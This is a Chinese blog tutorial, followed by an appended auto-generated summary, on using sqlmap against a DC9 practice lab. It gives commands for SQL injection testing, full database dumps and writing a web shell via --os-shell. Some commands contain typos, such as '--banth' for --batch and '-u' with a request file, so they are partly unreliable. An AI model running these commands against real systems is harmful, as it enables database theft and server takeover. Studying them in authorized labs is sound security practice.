sqlmap基本使用方法

本文只介绍sqlmap的简单使用方法,参考官方文档

https://github.com/sqlmapproject/sqlmap/wiki/Usage

csdn师傅

https://blog.csdn.net/Breeze_CAT/article/details/80628392

个人建议,具体参数直接看csdn师傅的即可,本文以DC9靶场作为目标进行练习,使用sqlmap获取目标数据或权限

GET型

sqlmap -u http://192.168.43.143/ceshi.php?id=1 --banth --level 4 

-u 输入自己的目标地址
--batch 自动输入选项的属性值
--level 设置测试的等级(1-5,默认为1)lv2:cookie注入; lv3:user-agent注入,lv4:refere注入; lv5:host注入
POST型
可以获取对应地址的请求包,使用bp抓包保存即可

sqlmap -u ceshi.txt --batch --level 4

或者

sqlmap -u http://192.168.43.143/results.php   --method=POST --data="search=1" --level 4 --batch

--method 选择传参的方式
--data 选择传入的参数

sqlmap -u http://192.168.43.143/results.php   --method=POST --data="search=1" --level 4 --batch --random-agent

--random-agent 采用随机UA头
sqlmap -r ceshi.txt --batch --current-db 查看当前数据库
--current-db 查看当前数据库
查询数据库内容
查看拥有的数据库名称

sqlmap -r ceshi.txt --batch --dbs --level 4

选择数据库,查询表名

sqlmap -r cesh.txt --batch -D shujuku --tables

查询表格内列名

sqlmap -r ceshi.txt --batch -D shjuku -T biao --columns

查看表格内某些列内容

sqlmap -r ceshi.txt --batch -D shujuku -T biao -C id,username --dump

--dump 下载的意思,前面跟的参数是需要下载的内容

sqlmap -r ceshi.txt --batch --dump-all

--dump-all 代表下载全部的意思,也就是脱裤操作
查看数据库,表格内容的对应关系

sqlmap -r ceshi.txt --schema 

--schema 目标数据库数据库系统管理模式,类似于拓扑图的一种
写入木马,执行命令

sqlmap -r ceshi.txt --os-shell 

sqlmap会自动查找路径写入shell
指纹识别

sqlmap -r ceshi.txt -f --dbs 

当目标存在注入时,使用-f参数即可获取到目标的操作系统信息

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLMap是一种常见的SQL注入工具,用于发现和利用Web应用程序中的SQL注入漏洞。它可以自动检测和利用各种类型的SQL注入漏洞,并提供了丰富的选项和功能来帮助进行渗透测试。 基本使用方法如下: 1. 安装SQLMap:你可以从官方网站下载SQLMap的最新版本,并按照官方文档中提供的说明进行安装。 2. 目标URL:使用`-u`参数指定目标URL。例如,`sqlmap.py -u http://example.com/page?id=1`。 3. 请求方法使用`--method`参数指定请求方法,例如GET、POST或DELETE。例如,`sqlmap.py --method=GET -u http://example.com/page?id=1`。 4. 数据参数:如果目标URL是通过POST方法发送数据的,你可以使用`--data`参数指定数据参数。例如,`sqlmap.py --data="username=admin&password=123456" -u http://example.com/login`。 5. 数据库和表:你可以使用`-D`参数指定数据库名称,`--tables`参数列出数据库中的表。例如,`sqlmap.py -D dbname --tables -u http://example.com/page?id=1`。 6. 自动检测:SQLMap可以自动检测目标URL中是否存在SQL注入漏洞。你可以使用`--dbs`参数列出所有可用的数据库。例如,`sqlmap.py --dbs -u http://example.com/page?id=1`。 7. 进一步利用:一旦发现了SQL注入漏洞,你可以使用SQLMap的其他选项和功能来进一步利用漏洞,例如获取数据库中的数据、提取敏感信息等。你可以查阅SQLMap的官方文档了解更多详细的用法。 请注意,在进行任何渗透测试活动之前,确保已获得合法授权,并且仅在合法和合规的环境中使用SQLMap工具。 引用,,<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [网络安全原理与应用:SQL工具注入.pptx](https://download.csdn.net/download/u011062044/85388971)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值